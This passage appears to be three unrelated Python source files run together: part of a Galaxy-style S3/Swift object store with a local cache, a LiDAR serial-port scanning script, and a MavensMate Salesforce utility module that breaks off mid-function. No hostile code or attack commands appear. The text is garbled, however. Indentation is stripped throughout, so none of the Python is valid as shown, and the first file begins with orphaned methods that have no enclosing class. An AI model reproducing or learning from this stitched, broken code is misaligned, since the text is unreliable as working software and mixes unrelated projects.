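# For reference, the parser above expects an object store XML fragment shaped
# roughly like the sketch below; the attribute values are illustrative, and the
# enclosing element name is an assumption (it is whatever the caller passes in
# as config_xml):
# <object_store type="s3">
#     <auth access_key="..." secret_key="..." />
#     <bucket name="my-galaxy-bucket" use_reduced_redundancy="False" max_chunk_size="250" />
#     <connection host="" port="6000" is_secure="True" conn_path="/" multipart="True" />
#     <cache size="100" />
# </object_store>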
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contain 3-element tuples,
positioned as follows: position 0 holds the file's last-accessed timestamp
(as time.struct_time), position 1 holds the file path, and position 2 holds
the file size (e.g., (<access time>, '/mnt/data/dataset_1.dat', 472394)).
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
for entry in file_list:
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
""" Sometimes a handle to a bucket is not established right away so try
it a few times. Raise an error if the connection is not established. """
for i in range(5):
try:
bucket = self.conn.get_bucket(bucket_name)
log.debug("Using cloud object store with bucket '%s'", bucket.name)
return bucket
except S3ResponseError:
try:
log.debug("Bucket not found, creating s3 bucket with handle '%s'", bucket_name)
self.conn.create_bucket(bucket_name)
except S3ResponseError:
log.exception("Could not get bucket '%s', attempt %s/5", bucket_name, i + 1)
time.sleep(2)
# All the attempts have been exhausted and connection was not established,
# raise error
raise S3ResponseError
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms( path, self.config.umask, 0o666, self.config.gid )
def _construct_path(self, obj, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, **kwargs):
rel_path = os.path.join(*directory_hash_id(obj.id))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# S3 folders are marked by having trailing '/' so add it now
rel_path = '%s/' % rel_path
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_s3(self, rel_path):
try:
key = self.bucket.get_key(rel_path)
if key:
return key.size
except S3ResponseError:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.get_all_keys(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
key = Key(self.bucket, rel_path)
exists = key.exists()
except S3ResponseError:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
# TODO: Part of checking if a file is in cache should be to ensure the
# size of the cached file matches that on S3. Once the upload tool explicitly
# creates the dataset, this check should be implemented; in the meantime, it's
# not looking likely to be implementable reliably.
# if os.path.exists(cache_path):
# # print "***1 %s exists" % cache_path
# if self._key_exists(rel_path):
# # print "***2 %s exists in S3" % rel_path
# # Make sure the size in cache is available in its entirety
# # print "File '%s' cache size: %s, S3 size: %s" % (cache_path, os.path.getsize(cache_path), self._get_size_in_s3(rel_path))
# if os.path.getsize(cache_path) == self._get_size_in_s3(rel_path):
# # print "***2.1 %s exists in S3 and the size is the same as in cache (in_cache=True)" % rel_path
# exists = True
# else:
# # print "***2.2 %s exists but differs in size from cache (in_cache=False)" % cache_path
# exists = False
# else:
# # Although not perfect decision making, this most likely means
# # that the file is currently being uploaded
# # print "***3 %s found in cache but not in S3 (in_cache=True)" % cache_path
# exists = True
# else:
# return False
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.get_key(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
ret_code = subprocess.call("axel -a -n %s '%s'" % (ncores, url))
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
key.get_contents_to_filename(self._get_cache_path(rel_path), cb=self._transfer_cb, num_cb=10)
return True
except S3ResponseError:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
key = Key(self.bucket, rel_path)
if os.path.getsize(source_file) == 0 and key.exists():
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path)
return True
if from_string:
key.set_contents_from_string(from_string, reduced_redundancy=self.use_rr)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path)
mb_size = os.path.getsize(source_file) / 1e6
if mb_size < 10 or (not self.multipart):
self.transfer_progress = 0 # Reset transfer progress counter
key.set_contents_from_filename(source_file,
reduced_redundancy=self.use_rr,
cb=self._transfer_cb,
num_cb=10)
else:
multipart_upload(self.s3server, self.bucket, key.name, source_file, mb_size)
end_time = datetime.now()
log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except S3ResponseError:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_s3(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
os.path.getsize(self._get_cache_path(rel_path)), self._get_size_in_s3(rel_path))
return False
def exists(self, obj, **kwargs):
in_cache = in_s3 = False
rel_path = self._construct_path(obj, **kwargs)
# Check cache
if self._in_cache(rel_path):
in_cache = True
# Check S3
in_s3 = self._key_exists(rel_path)
# log.debug("~~~~~~ File '%s' exists in cache: %s; in s3: %s" % (rel_path, in_cache, in_s3))
# dir_only does not get synced so shortcut the decision
dir_only = kwargs.get('dir_only', False)
if dir_only:
if in_cache or in_s3:
return True
else:
return False
# TODO: Sync should probably not be done here. Add this to an async upload stack?
if in_cache and not in_s3:
self._push_to_os(rel_path, source_file=self._get_cache_path(rel_path))
return True
elif in_s3:
return True
else:
return False
def create(self, obj, **kwargs):
if not self.exists(obj, **kwargs):
# Pull out locally used fields
extra_dir = kwargs.get('extra_dir', None)
extra_dir_at_root = kwargs.get('extra_dir_at_root', False)
dir_only = kwargs.get('dir_only', False)
alt_name = kwargs.get('alt_name', None)
# Construct hashed path
rel_path = os.path.join(*directory_hash_id(obj.id))
# Optionally append extra_dir
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# Create given directory in cache
cache_dir = os.path.join(self.staging_path, rel_path)
if not os.path.exists(cache_dir):
os.makedirs(cache_dir)
# Although not really necessary to create S3 folders (because S3 has
# flat namespace), do so for consistency with the regular file system
# S3 folders are marked by having trailing '/' so add it now
# s3_dir = '%s/' % rel_path
# self._push_to_os(s3_dir, from_string='')
# If instructed, create the dataset in cache & in S3
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
open(os.path.join(self.staging_path, rel_path), 'w').close()
self._push_to_os(rel_path, from_string='')
def empty(self, obj, **kwargs):
if self.exists(obj, **kwargs):
return bool(self.size(obj, **kwargs) > 0)
else:
raise ObjectNotFound( 'objectstore.empty, object does not exist: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
def size(self, obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
if self._in_cache(rel_path):
try:
return os.path.getsize(self._get_cache_path(rel_path))
except OSError as ex:
log.info("Could not get size of file '%s' in local cache, will try S3. Error: %s", rel_path, ex)
elif self.exists(obj, **kwargs):
return self._get_size_in_s3(rel_path)
log.warning("Did not find dataset '%s', returning 0 for size", rel_path)
return 0
def delete(self, obj, entire_dir=False, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
extra_dir = kwargs.get('extra_dir', None)
try:
# For the case of extra_files, because we don't have a reference to
# individual files/keys we need to remove the entire directory structure
# with all the files in it. This is easy for the local file system,
# but requires iterating through each individual key in S3 and deleting it.
if entire_dir and extra_dir:
shutil.rmtree(self._get_cache_path(rel_path))
results = self.bucket.get_all_keys(prefix=rel_path)
for key in results:
log.debug("Deleting key %s", key.name)
key.delete()
return True
else:
# Delete from cache first
os.unlink(self._get_cache_path(rel_path))
# Delete from S3 as well
if self._key_exists(rel_path):
key = Key(self.bucket, rel_path)
log.debug("Deleting key %s", key.name)
key.delete()
return True
except S3ResponseError:
log.exception("Could not delete key '%s' from S3", rel_path)
except OSError:
log.exception('%s delete error', self.get_filename(obj, **kwargs))
return False
def get_data(self, obj, start=0, count=-1, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Check cache first and get file if not there
if not self._in_cache(rel_path):
self._pull_into_cache(rel_path)
# Read the file content from cache
data_file = open(self._get_cache_path(rel_path), 'r')
data_file.seek(start)
content = data_file.read(count)
data_file.close()
return content
def get_filename(self, obj, **kwargs):
dir_only = kwargs.get('dir_only', False)
rel_path = self._construct_path(obj, **kwargs)
cache_path = self._get_cache_path(rel_path)
# S3 does not recognize directories as files so cannot check if those exist.
# So, if checking dir only, ensure given dir exists in cache and return
# the expected cache path.
# dir_only = kwargs.get('dir_only', False)
# if dir_only:
# if not os.path.exists(cache_path):
# os.makedirs(cache_path)
# return cache_path
# Check if the file exists in the cache first
if self._in_cache(rel_path):
return cache_path
# Check if the file exists in persistent storage and, if it does, pull it into cache
elif self.exists(obj, **kwargs):
if dir_only: # Directories do not get pulled into cache
return cache_path
else:
if self._pull_into_cache(rel_path):
return cache_path
# For the case of retrieving a directory only, return the expected path
# even if it does not exist.
# if dir_only:
# return cache_path
raise ObjectNotFound( 'objectstore.get_filename, no cache_path: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
# return cache_path # Until the upload tool does not explicitly create the dataset, return expected path
def update_from_file(self, obj, file_name=None, create=False, **kwargs):
if create:
self.create(obj, **kwargs)
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
# Choose whether to use the dataset file itself or an alternate file
if file_name:
source_file = os.path.abspath(file_name)
# Copy into cache
cache_file = self._get_cache_path(rel_path)
try:
if source_file != cache_file:
# FIXME? Should this be a `move`?
shutil.copy2(source_file, cache_file)
self._fix_permissions(cache_file)
except OSError:
log.exception("Trouble copying source file '%s' to cache '%s'", source_file, cache_file)
else:
source_file = self._get_cache_path(rel_path)
# Update the file on S3
self._push_to_os(rel_path, source_file)
else:
raise ObjectNotFound( 'objectstore.update_from_file, object does not exist: %s, kwargs: %s'
% ( str( obj ), str( kwargs ) ) )
def get_object_url(self, obj, **kwargs):
if self.exists(obj, **kwargs):
rel_path = self._construct_path(obj, **kwargs)
try:
key = Key(self.bucket, rel_path)
return key.generate_url(expires_in=86400) # 24hrs
except S3ResponseError:
log.exception("Trouble generating URL for dataset '%s'", rel_path)
return None
def get_store_usage_percent(self):
return 0.0
class SwiftObjectStore(S3ObjectStore):
"""
Object store that stores objects as items in a Swift bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and Swift.
"""
def _configure_connection(self):
log.debug("Configuring Swift Connection")
self.conn = boto.connect_s3(aws_access_key_id=self.access_key,
aws_secret_access_key=self.secret_key,
is_secure=self.is_secure,
host=self.host,
port=self.port,
calling_format=boto.s3.connection.OrdinaryCallingFormat(),
path=self.conn_path)
|
LiDAR.py
|
import serial
import serial.tools.list_ports
import math
import threading
import os
import sys
import time
import matplotlib.pyplot as plt
import rplidar
pwd = os.path.abspath(os.path.abspath(__file__))
father_path = os.path.abspath(os.path.dirname(pwd) + os.path.sep + "..")
sys.path.append(father_path)
data_path = os.path.abspath(
os.path.dirname(os.path.abspath(__file__)) + os.path.sep + ".." +
os.path.sep + "data")
def print_serial(port):
print("---------------[ %s ]---------------" % port.name)
print("Path: %s" % port.device)
print("Descript: %s" % port.description)
print("HWID: %s" % port.hwid)
if port.manufacturer is not None:
print("Manufacturer: %s" % port.manufacturer)
if port.product is not None:
print("Product: %s" % port.product)
if port.interface is not None:
print("Interface: %s" % port.interface)
if port.vid is not None:
print("Vid:", port.vid)
if port.pid is not None:
print("Pid:", port.pid)
print()
def detect_serials(description="target device", vid=0x10c4, pid=0xea60):
ports = serial.tools.list_ports.comports()
for port in ports:
print_serial(port)
if port.description.__contains__(description):
port_path = port.device
return port_path
else:
print("Cannot find the target device: %s" % description)
return None
class lidar(object):
def __init__(self,is_zmq:bool=False):
super().__init__()
self.port_name = detect_serials(description="CP2102 USB")
if not is_zmq:
self.rplidar = rplidar.RPLidar(self.port_name)
else:
self.rplidar = []
self.scan_data_list = []
def rplidar_scan_procedure(self,is_show:bool=False):
# present_time = time.time()
while True:
try:
info = self.rplidar.get_info()
health = self.rplidar.get_health()
print(info)
print(health)
for i, scan in enumerate(self.rplidar.iter_scans(max_buf_meas=5000)):
self.scan_data_list = scan
if is_show:
print(self.scan_data_list)
except BaseException as be:
self.rplidar.clean_input()
# self.stop()
# self.stop_motor()
def zmq_scan(self,is_show:bool=False):
while True:
try:
pass
except Exception as be:
pass
if __name__ == "__main__":
lidar_instance = lidar()
thread_lidar_scan = threading.Thread(target=lidar_instance.rplidar_scan_procedure,args=())
thread_lidar_scan.start()
|
mm_util.py
|
import keyring
import os
import yaml
import json
import re
import config
import shutil
import tempfile
import string
import random
import base64
import zipfile
import time
import datetime
import threading
import sys
import re
import xmltodict
import codecs
import traceback
import plistlib
import platform
import itertools
from mm_exceptions import MMException
from jinja2 import Environment, FileSystemLoader
import jinja2.ext
import jinja2htmlcompress
from jinja2htmlcompress import HTMLCompress
TOOLING_API_EXTENSIONS = ['cls', 'trigger', 'page', 'component']
SFDC_API_VERSION = "27.0" #is overridden upon instantiation of mm_connection if plugin specifies mm_api_version
PRODUCTION_ENDPOINT = "https://www.salesforce.com/services/Soap/u/"+SFDC_API_VERSION
SANDBOX_ENDPOINT = "https://test.salesforce.com/services/Soap/u/"+SFDC_API_VERSION
PRERELEASE_ENDPOINT = "https://prerellogin.pre.salesforce.com/services/Soap/u/"+SFDC_API_VERSION
PRODUCTION_ENDPOINT_SHORT = "https://www.salesforce.com"
SANDBOX_ENDPOINT_SHORT = "https://test.salesforce.com"
PRERELEASE_ENDPOINT_SHORT = "https://prerellogin.pre.salesforce.com"
WSDL_PATH = config.base_path + "/lib/wsdl" #this can be overridden by client settings or request parameter
ENDPOINTS = {
"production" : PRODUCTION_ENDPOINT,
"developer" : PRODUCTION_ENDPOINT,
"sandbox" : SANDBOX_ENDPOINT,
"prerelease" : PRERELEASE_ENDPOINT
}
URL_TO_ENDPOINT_TYPE = {
PRODUCTION_ENDPOINT : "production",
SANDBOX_ENDPOINT : "sandbox",
PRERELEASE_ENDPOINT : "prerelease"
}
template_path = config.base_path + "/lib/templates"
env = Environment(loader=FileSystemLoader(template_path),trim_blocks=True)
def get_timestamp():
ts = time.time()
return datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d-%H:%M:%S')
def parse_json_from_file(location):
if not os.path.exists(location):
return {}
try:
json_data = open(location)
if json_data:
data = json.load(json_data)
json_data.close()
return data
except:
return parse_json(location)
def parse_xml_from_file(location):
if not os.path.exists(location):
return {}
try:
xml_data = open(location)
data = xmltodict.parse(xml_data,postprocessor=xmltodict_postprocessor)
xml_data.close()
return data
except:
return {}
def get_sfdc_endpoint(url):
endpoint = PRODUCTION_ENDPOINT
if "test" in url:
endpoint = SANDBOX_ENDPOINT
elif "prerellogin.pre.salesforce.com" in url:
endpoint = PRERELEASE_ENDPOINT
return endpoint
def get_endpoint_type_by_url(endpoint):
if endpoint in URL_TO_ENDPOINT_TYPE:
return URL_TO_ENDPOINT_TYPE[endpoint]
else:
return ""
def get_sfdc_endpoint_by_type(type):
if type in ENDPOINTS:
return ENDPOINTS[type]
else:
return ""
def put_project_directory_on_disk(project_name, **kwargs):
if 'force' in kwargs and kwargs['force'] == True:
if os.path.isdir(config.connection.workspace+"/"+project_name):
shutil.rmtree(config.connection.workspace+"/"+project_name)
os.makedirs(config.connection.workspace+"/"+project_name)
def put_password(project_name, password):
keyring.set_password('MavensMate: '+project_name+'-mm', project_name+'-mm', password)
def get_password_by_project_name(project_name):
#TODO: transition to ID-based processing
pw = keyring.get_password('MavensMate: '+project_name+'-mm', project_name+'-mm')
if pw == None:
pw = keyring.get_password('MavensMate: '+project_name, project_name+'-mm')
return pw
def put_password_by_key(key, password):
keyring.set_password('MavensMate: '+key, key, password)
def get_password_by_key(key):
return keyring.get_password('MavensMate: '+key, key)
def delete_password_by_key(key):
try:
return keyring.delete_password('MavensMate: '+key, key)
except:
#TODO: this has not been implemented in keyring yet :-(
pass
def get_file_extension(path):
return os.path.splitext(path)[1]
def get_file_as_string(file_path):
try:
f = codecs.open(file_path, "r", "utf8")
file_body = f.read()
f.close()
return file_body
except Exception, e:
print "Couldn't open "+str(file_path)+" because: "+e.message
return ""
def parse_rest_response(body):
rjson = json.loads(body)
return rjson
def zip_directory(directory_to_zip, where_to_put_zip_file=tempfile.gettempdir(), base64_encode=True):
shutil.make_archive(where_to_put_zip_file+'/mm', 'zip', directory_to_zip+"/")
if base64_encode == True:
        file_contents = open(where_to_put_zip_file+"/mm.zip", "rb").read()
base64_zip = base64.b64encode(file_contents)
return base64_zip
def extract_base64_encoded_zip(encoded, where_to_extract):
zip_path = os.path.join(where_to_extract,"metadata.zip")
#write file to disk
data = base64.b64decode(encoded)
    src = open(zip_path, "wb")
src.write(data)
src.close()
#extract file from disk - z.extractall(where_to_extract) fails with non ascii chars
f = zipfile.ZipFile(zip_path, 'r')
for fileinfo in f.infolist():
path = where_to_extract
directories = fileinfo.filename.decode('utf8').split('/')
for directory in directories:
path = os.path.join(path, directory)
if directory == directories[-1]: break # the file
if not os.path.exists(path):
os.makedirs(path)
outputfile = open(path, "wb")
shutil.copyfileobj(f.open(fileinfo.filename), outputfile)
#remove zip file
os.remove(where_to_extract+"/metadata.zip")
def rename_directory(old_directory_name, new_directory_name):
os.rename(old_directory_name, new_directory_name)
def xmltodict_postprocessor(path, key, value):
try:
if value == 'true':
return key, True
elif value == 'false':
return key, False
else:
return key, value
except (ValueError, TypeError):
return key, value
# >>> xmltodict.parse('<a><b>1</b><b>2</b><b>x</b></a>',
# ... postprocessor=postprocessor)
# OrderedDict([(u'a', OrderedDict([(u'b:int', [1, 2]), (u'b', u'x')]))])
def parse_json(filename):
""" Parse a JSON file
First remove comments and then use the json module package
Comments look like :
// ...
or
/*
...
*/
"""
# Regular expression for comments
comment_re = re.compile(
        r'(^)?[^\S\n]*/(?:\*(.*?)\*/[^\S\n]*|/[^\n]*)($)?',
re.DOTALL | re.MULTILINE
)
with open(filename) as f:
content = ''.join(f.readlines())
## Looking for comments
match = comment_re.search(content)
while match:
# single line comment
content = content[:match.start()] + content[match.end():]
match = comment_re.search(content)
# Return json file
return json.loads(content)
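# Illustrative usage sketch (not part of MavensMate itself): parse_json strips the
# //-style and /* ... */-style comments described above before handing the text to
# json.loads. The temp file and its contents are made up purely for this example.
def _parse_json_example():
    commented_json = '{\n  // plugin settings\n  "mm_play_sounds": false /* default */\n}'
    tmp = tempfile.NamedTemporaryFile(mode='w', suffix='.json', delete=False)
    tmp.write(commented_json)
    tmp.close()
    return parse_json(tmp.name)  # both comments are removed => {'mm_play_sounds': False}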
def put_tmp_directory_on_disk(put_unpackaged_directory=False):
tmp_dir = tempfile.gettempdir()
mm_tmp_directory = "{0}/.org.mavens.mavensmate.{1}".format(tmp_dir, get_random_string())
os.makedirs(mm_tmp_directory)
if put_unpackaged_directory == True:
os.makedirs(mm_tmp_directory+"/unpackaged")
return mm_tmp_directory, mm_tmp_directory+"/unpackaged"
return mm_tmp_directory
def put_package_xml_in_directory(directory, file_contents, isDelete=False):
file_name = 'package.xml' if isDelete == False else 'destructiveChanges.xml'
f = open("{0}/{1}".format(directory, file_name), 'w')
f.write(file_contents)
f.close()
def put_empty_package_xml_in_directory(directory, file_contents):
file_name = 'package.xml'
f = open("{0}/{1}".format(directory, file_name), 'w')
f.write(file_contents)
f.close()
def get_random_string(size=8, chars=string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def new_mavensmate_id(size=32, chars=string.ascii_uppercase + string.digits):
return ''.join(random.choice(chars) for x in range(size))
def delete_directory(directory):
if os.path.isdir(directory):
shutil.rmtree(directory)
#returns package.xml contents based on dict of metadata
def get_package_xml_contents(metadata_hash={}):
#metadata_hash = {'ApexClass':['foo', 'bar'], 'ApexPage':'*'}
#metadata_hash = {'ApexClass':'*'}
template = env.get_template('package.html')
return template.render(sfdc_api_version=SFDC_API_VERSION, hash=metadata_hash)
def get_empty_package_xml_contents():
template = env.get_template('empty_package.html')
return template.render(sfdc_api_version=SFDC_API_VERSION)
def get_default_metadata_data():
return parse_json_from_file(config.base_path + "/lib/sforce/metadata/default_metadata.json")
def get_child_metadata_data():
return parse_json_from_file(config.base_path + "/lib/sforce/metadata/default_child_metadata.json")
def get_meta_type_by_suffix(suffix):
if '-meta' in suffix:
suffix = suffix.split('-meta')[0]
data = get_default_metadata_data()
for item in data["metadataObjects"]:
if 'suffix' in item and item['suffix'] == suffix:
return item
def get_meta_type_by_dir(dir_name):
data = get_default_metadata_data()
for item in data["metadataObjects"]:
if 'directoryName' in item and item['directoryName'] == dir_name:
return item
def get_meta_type_by_name(name):
data = get_default_metadata_data()
child_data = get_child_metadata_data()
for item in data["metadataObjects"]:
if 'xmlName' in item and item['xmlName'] == name:
return item
for item in child_data:
if 'xmlName' in item and item['xmlName'] == name:
return item
def put_skeleton_files_on_disk(metadata_type, api_name, where, apex_class_type='default', apex_trigger_object_api_name=''):
template_map = config.connection.get_plugin_client_setting('mm_default_apex_templates_map', {})
custom_templates = config.connection.get_plugin_client_setting('mm_apex_templates_map', {})
#merge custom and default template maps
for apextype in template_map:
if apextype in custom_templates:
template_map[apextype] = dict(template_map[apextype], **custom_templates[apextype])
#get the template name
template_name = ''
try:
template_name = template_map[metadata_type][apex_class_type]
except:
template_name = template_map[metadata_type]['default']
try:
custom_template_path = config.connection.get_plugin_client_setting('mm_apex_templates_dir', config.connection.get_plugin_settings_path("User", "templates"))
if os.path.exists(os.path.join(custom_template_path, template_name)):
custom_env = Environment(loader=FileSystemLoader(custom_template_path),trim_blocks=True)
#try to load custom
template = custom_env.get_template(template_name)
else:
raise Exception("Template does not exist")
except:
#load default template
template = env.get_template(template_name)
file_body = template.render(api_name=api_name,object_name=apex_trigger_object_api_name)
metadata_type = get_meta_type_by_name(metadata_type)
os.makedirs("{0}/{1}".format(where, metadata_type['directoryName']))
f = open("{0}/{1}/{2}".format(where, metadata_type['directoryName'], api_name+"."+metadata_type['suffix']), 'w')
f.write(file_body)
f.close()
template = env.get_template('meta.html')
file_body = template.render(api_name=api_name, sfdc_api_version=SFDC_API_VERSION,meta_type=metadata_type['xmlName'])
f = open("{0}/{1}/{2}".format(where, metadata_type['directoryName'], api_name+"."+metadata_type['suffix'])+"-meta.xml", 'w')
f.write(file_body)
f.close()
def parse_manifest(location):
return parse_json_from_file(location)
def generate_ui(operation,params={}):
template_path = config.base_path + "/lib/ui/templates"
env = Environment(loader=FileSystemLoader(template_path),trim_blocks=True)
env.globals['play_sounds'] = play_sounds
temp = tempfile.NamedTemporaryFile(delete=False, prefix="mm")
if operation == 'new_project':
template = env.get_template('/project/new.html')
file_body = template.render(user_action='new',base_path=config.base_path,workspace=config.connection.workspace,client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'checkout_project':
template = env.get_template('/project/new.html')
file_body = template.render(user_action='checkout',base_path=config.base_path,workspace=config.connection.workspace,client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'upgrade_project':
template = env.get_template('/project/upgrade.html')
file_body = template.render(
base_path=config.base_path,
name=config.connection.project.project_name,
project_location=config.connection.project.location,
client=config.connection.plugin_client
).encode('UTF-8')
elif operation == 'edit_project':
tree_body = ''
# if config.connection.project.is_metadata_indexed == True:
# template = env.get_template('/project/tree.html')
# org_metadata = config.connection.project.get_org_metadata()
# tree_body = template.render(metadata=org_metadata)
template = env.get_template('/project/edit.html')
creds = config.connection.project.get_creds()
file_body = template.render(
base_path=config.base_path,
name=config.connection.project.project_name,
username=creds['username'],
password=creds['password'],
org_type=creds['org_type'],
# has_indexed_metadata=config.connection.project.is_metadata_indexed,
project_location=config.connection.project.location,
# tree_body=tree_body,
client=config.connection.plugin_client
).encode('UTF-8')
elif operation == 'unit_test':
template = env.get_template('/unit_test/index.html')
istest = re.compile(r"@istest", re.I)
testmethod = re.compile(r"testmethod", re.I)
apex_classes = []
for dirname, dirnames, filenames in os.walk(config.connection.project.location+"/src/classes"):
for f in filenames:
if f == "." or f == ".." or '-meta.xml' in f or ".svn" in f:
continue
try:
full_file_path = dirname+"/"+f
if istest.search(open(full_file_path).read()) or testmethod.search(open(full_file_path).read()):
apex_classes.append(f.split(".")[0])
except:
continue
if "selected" in params:
selected = params["selected"]
else:
selected = []
file_body = template.render(
base_path=config.base_path,
name=config.connection.project.project_name,
classes=apex_classes,
selected=selected,
client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'deploy':
tree_body = ''
if config.connection.project.is_metadata_indexed == True:
template = env.get_template('/project/tree.html')
selected = params['selected'] if 'selected' in params else None
org_metadata = config.connection.project.get_org_metadata(selected)
tree_body = template.render(metadata=org_metadata,operation=operation)
template = env.get_template('/deploy/index.html')
file_body = template.render(
base_path=config.base_path,
name=config.connection.project.project_name,
has_indexed_metadata=config.connection.project.is_metadata_indexed,
project_location=config.connection.project.location,
connections=config.connection.project.get_org_connections(False),
tree_body=tree_body,
operation=operation,
client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'execute_apex':
template = env.get_template('/execute_apex/index.html')
file_body = template.render(
base_path=config.base_path,
name=config.connection.project.project_name,
project_location=config.connection.project.location,
client=config.connection.plugin_client).encode('UTF-8')
elif operation == 'new_project_from_existing_directory':
project_name = os.path.basename(params['directory'])
template = env.get_template('/project/new_from_existing.html')
file_body = template.render(
base_path=config.base_path,
